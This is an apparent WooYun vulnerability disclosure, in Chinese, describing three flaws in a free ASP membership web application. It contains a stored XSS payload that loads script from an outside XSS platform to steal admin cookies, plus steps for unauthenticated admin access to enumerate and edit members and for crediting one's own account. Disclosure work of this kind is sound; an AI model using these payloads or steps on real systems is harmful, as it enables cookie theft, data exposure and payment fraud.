WooYun.org

0x01 前台XSS，使用官方最新的免费版源代码
在注册用户的时候，地址当中输入XSS代码
"><script src=http://xsser.l1n3.net/WY6NN2?1407683427></script>
如图

然后注册，显示注册成功

这时候查看一下后台---会员信息管理--会员管理---该会员详细信息

可以看到xss代码已经插进去了
而xss平台也能收到cookies信息

0x02 未授权访问
http://127.0.0.1/admin/huiyuandetail.asp?id=831
该地址在免费版中未做权限检查，导致可以直接在这里遍历会员信息，同时可以修改任意会员信息
相关代码
huiyuandetail.asp中检查过了，无权限相关检查，包含的两个文件，一个conn中给了一个cookies
conn.asp

8 m_user=session("m_user")
9 m_gold=session("m_gold")

另一个check4.asp是空文件，无用
导致了未授权的访问，完全可以遍历用户信息

0x03
业务逻辑导致给自己充钱
依然是之前的未授权访问，访问
http://127.0.0.1/admin/Chongzhiadd.asp
然后选择会员，我选择自己

冲他个百八十万的，我也是土豪，嘎嘎，然后直接确定，
查看充值记录

好了，瞬间变土豪....
还有一些其他的漏洞，暂时还没测试出来，等下一波再发吧